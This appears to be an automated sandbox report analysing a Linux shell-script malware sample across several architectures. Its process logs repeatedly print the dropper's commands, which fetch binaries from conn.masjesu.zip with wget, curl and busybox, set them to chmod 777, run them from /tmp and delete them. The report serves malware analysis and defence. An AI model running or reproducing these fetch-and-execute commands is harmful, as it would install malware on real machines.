Malware Analysis Report

2025-05-06 03:38

Sample ID 241124-cgx12avjgr
Target 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
SHA256 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9

Threat Level: Shows suspicious behavior

The file 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 02:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 02:03

Reported

2024-11-24 02:06

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.15:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 02:03

Reported

2024-11-24 02:06

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

29s

Command Line

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 02:03

Reported

2024-11-24 02:06

Platform

debian9-mipsbe-20240611-en

Max time kernel

96s

Max time network

99s

Command Line

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 N/A
N/A /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs N/A
N/A /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 N/A
N/A /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s N/A
N/A /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T N/A
N/A /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z N/A
N/A /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF N/A
N/A /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j N/A
N/A /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV N/A
N/A /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH N/A
N/A /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj N/A
N/A /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU N/A
N/A /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr N/A
N/A /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya N/A
N/A /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV N/A
N/A /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH N/A
N/A /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj N/A
N/A /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU N/A
N/A /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr N/A
N/A /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya N/A
N/A /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 N/A
N/A /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s N/A
N/A /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T N/A
N/A /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 N/A
N/A /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs N/A
N/A /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z N/A
N/A /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF N/A
N/A /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /usr/bin/curl N/A
File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /usr/bin/curl N/A
File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /usr/bin/curl N/A
File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /usr/bin/curl N/A
File opened for modification /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 /usr/bin/curl N/A
File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /usr/bin/curl N/A
File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /usr/bin/curl N/A
File opened for modification /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj /usr/bin/curl N/A
File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /usr/bin/curl N/A
File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /usr/bin/curl N/A
File opened for modification /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 /usr/bin/curl N/A
File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /usr/bin/curl N/A
File opened for modification /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z /usr/bin/curl N/A
File opened for modification /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV /usr/bin/curl N/A
File opened for modification /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T /usr/bin/curl N/A
File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /usr/bin/curl N/A
File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /usr/bin/curl N/A
File opened for modification /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs /usr/bin/curl N/A
File opened for modification /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya /usr/bin/curl N/A
File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /usr/bin/curl N/A
File opened for modification /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr /usr/bin/curl N/A
File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /usr/bin/curl N/A
File opened for modification /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j /usr/bin/curl N/A
File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /usr/bin/curl N/A
File opened for modification /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU /usr/bin/curl N/A
File opened for modification /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH /usr/bin/curl N/A
File opened for modification /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s /usr/bin/curl N/A
File opened for modification /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF /usr/bin/curl N/A

Processes

/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh

[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/chmod

[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1

[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/bin/rm

[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/chmod

[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs

[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/bin/rm

[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/chmod

[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8

[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/bin/rm

[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/chmod

[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s

[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/bin/rm

[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/chmod

[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T

[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/bin/rm

[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/chmod

[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z

[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/bin/rm

[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/chmod

[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF

[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/bin/rm

[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/chmod

[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j

[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/bin/rm

[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/chmod

[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV

[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/rm

[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/chmod

[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH

[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/rm

[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/chmod

[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj

[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/rm

[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/chmod

[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU

[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/bin/rm

[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/chmod

[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr

[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/bin/rm

[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/chmod

[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya

[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/bin/rm

[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/chmod

[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV

[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/bin/rm

[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/chmod

[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH

[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/bin/rm

[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]

/bin/chmod

[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
